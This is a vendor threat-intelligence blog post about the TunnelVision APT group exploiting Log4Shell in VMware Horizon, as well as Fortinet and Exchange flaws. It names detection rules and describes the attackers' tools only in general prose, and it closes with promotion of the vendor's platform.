TunnelVision APT Group Exploits the Log4j

WRITTEN BY
Alla Yurchenko
[post-views]
February 23, 2022 · 4 min read
TunnelVision APT

One of the most notorious exploits of 2021 made its loud entrance in the cybersecurity world in December, and now Log4Shell is back on the radar: Iran-linked TunnelVision APT did not let it rest in peace, striking with profiteering from VMware Horizon Log4j vulnerabilities, along with large-scale exploitation of Fortinet FortiOS (CVE-2018-13379) and Microsoft Exchange (ProxyShell).

TunnelVision’s Activities Detection

According to the current data, TunnelVision’s ultimate objective is to distribute ransomware, taking advantage of unpatched VMware Horizon servers. Check out the Sigma rules that identify threat actor activities: detect command lines used to maintain persistence, DLL sideloading, and other suspicious behaviors associated with wide-exploitation of 1-day vulnerabilities as Fortinet FortiOS, ProxyShell, and Log4Shell.

TunnelVision Threat Actor Exploiting VMware Horizon via Log4j Vulnerability (via process creation)

Exploitation of the Log4j(CVE-2021-44228) vulnerability in VMware Horizon (via Scheduled Task Creation)

Prophet Spider with the exploitation of the Log4j(CVE-2021-44228) vulnerability in VMware Horizon (via cmdline)

Log4j RCE (CVE-2021-44228) Target in VMware Horizon via VMBlastSG Service

Log4j Exploit Hits Again Vulnerable VMWare Horizon Servers at Risk (via process_creation)

Log4j Exploit Hits Again Vulnerable VMWare Horizon Servers at Risk (via process_creation)

The rules are provided by our keen Threat Bounty developers  Sittikorn Sangrattanapitak, Aytek Aytemur, Nattatorn Chuensangarun, Emir Erdogan.

TunnelVision attackers are proven to employ tunneling tools (hence the name), such as Fast Reverse Proxy Client (FRPC) and Plink, to avoid detection. In this environment, all security professionals are strongly recommended to share threat intelligence with the community and take advantage of the available indicators of compromise. Moreover, it is only wise to fetch the opportunity to take your defense & detection routine up a notch. To check the full list of detection content, visit the SOC Prime platform. Adepts at cybersecurity are more than welcome to join the Threat Bounty program to publish SOC content on the industry-leading platform and get rewarded for their valuable input.

View Detections Join Threat Bounty

TunnelVision APT Group Exploits

Security is only as strong as the weakest link. A few months ago, the Log4j library became the primary gateway for threat actors into victims’ devices and networks. Since Log4Shell, aka Log4j or LogJam critical vulnerability in Apache Log4j, first surfaced in December 2021, companies worldwide have been grappling with severe cybersecurity concerns. Notorious Log4Shell stunned the digital security community by the severity of incidents, as well as how fast they were mounting. The ease of exploiting the library bug enabled an unauthenticated remote code execution granting entire system compromise. It lured many adversaries and was massively exploited in the wild.

Today, TunnelVision is exploiting the Log4j vulnerability, Fortinet FortiOS, and Microsoft Exchange in the Middle East and the USA as the primary target regions, SentinelOne researchers report. The analysis of TTPs traces patterns characteristic of Iranian state-backed hacker organizations Nemesis Kitten, Phosphorus, and Charming Kitten.

The exploitation of Log4j in VMware Horizon is marked by a malicious process that emerges from the VMware product’s Tomcat service. According to the researchers, the adversaries initially exploit the Log4j to execute PowerShell commands and then carry on with PS reverse shells commands via the Tomcat. With PowerShell, threat actors download tunneling tools such as Ngrok with the goal of dropping PowerShell backdoors. The first exploit package is a zip file with an executable InteropServices.exe; the second one is a modified version of a PowerShell one-liner which has been widely used by state-sponsored hackers in previous campaigns.

TunnelVision is reported to have used a GitHub repository, “VmWareHorizon” to store the payloads throughout the operation.

Wrapping Up

APTs are an excelling and dangerous facet of the modern cybersecurity threat framework. The SOC Prime platform helps defend against APTs’ tailored hacking solutions faster and more efficiently. Test the content streaming capabilities of the CCM module and help your organization empower daily SOC operations with cyber threat intelligence. Keep the finger on the pulse of the fast-paced environment of cybersecurity risks and get the best mitigation solutions with SOC Prime.

Was this article helpful?

Like and share it with your peers.
Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Related Posts